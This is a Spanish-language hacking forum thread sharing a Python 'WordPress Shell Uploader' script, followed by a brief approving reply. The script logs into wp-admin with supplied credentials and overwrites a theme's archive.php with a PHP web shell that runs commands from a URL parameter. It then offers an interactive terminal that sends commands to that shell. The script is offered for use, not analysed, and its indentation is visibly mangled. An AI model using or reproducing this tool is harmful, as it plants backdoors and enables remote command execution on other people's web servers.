comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Auto - Wordpress Shell Uploader Beta

  • 1 Respuestas
  • 1720 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Agosto 05, 2013, 12:35:38 am »
Hola, les paso a dejar esta tool que permite cargar shells en sitios con wordpress
para cargarlas se necesita el usuario y la pass del wp-admin :D



Código: Bash
  1. #!/usr/bin/env python
  2. #Install mechanize and Beautifulsoup
  3. #easy_install mechanize,BeautifulSoup
  4. #Give full url path to avoid issues
  5. from BeautifulSoup import BeautifulSoup
  6. import mechanize
  7. from django.core.validators import URLValidator
  8. from django.core.exceptions import Validationerror
  9. import urllib2
  10. import sys
  11. import os
  12.  
  13. def check(main_url):
  14.  
  15. val = URLValidator(verify_exists=False)
  16. try:
  17. val(main_url)
  18. except Validationerror, e:
  19. print e
  20. br = mechanize.Browser()
  21.          br.set_handle_robots(False)
  22. br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  23. # Give user-agent any shit u want
  24.  
  25. check = br.open(main_url)
  26. html = check.read()
  27. soup = BeautifulSoup(html)
  28. search = soup.findAll('a',href="http://wordpress.org/")
  29. for i in search:
  30. if i['title'] == "Powered by WordPress":
  31. return(1)
  32. else:
  33. exit(1)
  34.  
  35. def wp_sucker():
  36.  
  37. try:
  38. br = mechanize.Browser()
  39.                  br.set_handle_robots(False)
  40.          print "[-] Enter the Worpress Site Login"
  41.                  main_url = raw_input()
  42.          stat = check(main_url)
  43.                  if stat == 1:
  44.                          pass
  45.                  else:
  46.                          print "[-] Enter a Wordpress Login Page Dumbass "
  47.                          exit(0)
  48.                                  sys.exit(0)
  49. base_url = main_url.replace('/wp-login.php','')
  50. br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  51. br.open(main_url)
  52. br.select_form(nr=0)
  53. print "[-] Enter UserName "
  54. user_name = raw_input()
  55. print "[-] Enter Password"
  56. password = raw_input()
  57. br.form['log'] = user_name
  58. br.form['pwd'] = password
  59. br.form.find_control('redirect_to').readonly = False
  60. br.form['redirect_to'] = base_url+"/wp-admin/themes.php"
  61. page = br.submit()
  62. new = page.read()
  63. #print html
  64. #page = br.open(base_url+"/wp-admin/themes.php").read()
  65. soup = BeautifulSoup(new)
  66. search = soup.findAll('code')
  67. #print search
  68. #themes = ''
  69. print "[-] Themes Available"
  70. for i in search:
  71. print i.text
  72.  
  73. print "[-] Select the Theme u would Like to upload the Shell"
  74. theme = raw_input()
  75. if theme == "twentyten":
  76. Theme = "Twenty+Ten"
  77. elif theme == "twentyeleven":
  78. Theme ="Twenty+Eleven"
  79. else:
  80. Theme = theme.title()
  81. url = base_url+"/wp-admin/theme-editor.php?file=/themes/%s/archive.php&theme=%s&dir=theme"%(theme,Theme)
  82.  
  83. br.open(url)
  84. br.select_form(nr=1)
  85. br.form['newcontent'] = "<?php system($_GET['cmd']) ?>"
  86. br.submit()
  87. print "[-] Shell Has been uploaded? Would like to interact.Enter y to interact"
  88. answer = raw_input()
  89. box = base_url.split('/')[2]
  90. if answer == 'Y' or answer == 'y':
  91. while True:
  92. cmd = raw_input(box+"@box~")
  93. if cmd == "exit":
  94. print "[-] Terminal Exited "
  95. print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/%s/archive.php?cmd="%theme
  96. os._exit(0)
  97. #sys.exit(0)
  98. else:
  99. shell_url = base_url+"/wp-content/themes/%s/archive.php?cmd=%s"%(theme,cmd)
  100. page = br.open(shell_url)
  101. print page.read()
  102. else:
  103. print "[-] Shell has Been Uploaded Interact whenever U want"
  104. print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/twentyten/archive.php?cmd="
  105. os._exit(0)
  106. #exit(0)
  107. #sys.exit(0)
  108. except KeyboardInterrupt:
  109. print"[-] trl^C Detected Shutting Down"
  110. else:
  111. print "[-] Something has gone wrong,Plse check ur Url or entered username or pass"
  112. print "[-] Shutting Down"
  113. exit()
  114.  
  115. def main():
  116. print "-------------------------------------------"
  117. print " Wordpress Shell Uploader"
  118. print " Credits to HR,Phaedrus \n"
  119. print " Login and get themes available for Upload"
  120. print " And Uploads a basic cmd shell"
  121. print "-------------------------------------------"
  122. wp_sucker()
  123. # shell_up()
  124.  
  125. main()
  126.  
  127. #EOF
  128. #Hoping to add new shit :)

Author del Script: torque59,

un Saludo !
« Última modificación: Marzo 23, 2015, 12:43:48 pm por Expermicid »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1892
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Agosto 08, 2013, 07:28:30 am »
Gran aportazo!!

Aunque prefiero la subida manual :D

Un saludo! :)



 

¿Te gustó el post? COMPARTILO!



[Python] Advance Reverse Shell By Xianur0

Iniciado por ProcessKill

Respuestas: 0
Vistas: 1090
Último mensaje Febrero 24, 2010, 04:07:57 pm
por ProcessKill
Shell reverse compartida

Iniciado por $francisco

Respuestas: 0
Vistas: 1846
Último mensaje Agosto 10, 2014, 06:57:55 pm
por $francisco
[Python] PasteBin Uploader

Iniciado por BigBear

Respuestas: 0
Vistas: 837
Último mensaje Julio 03, 2011, 09:54:33 pm
por BigBear
Anonfiles uploader

Iniciado por Sanko

Respuestas: 0
Vistas: 1101
Último mensaje Diciembre 04, 2013, 01:55:36 pm
por Sanko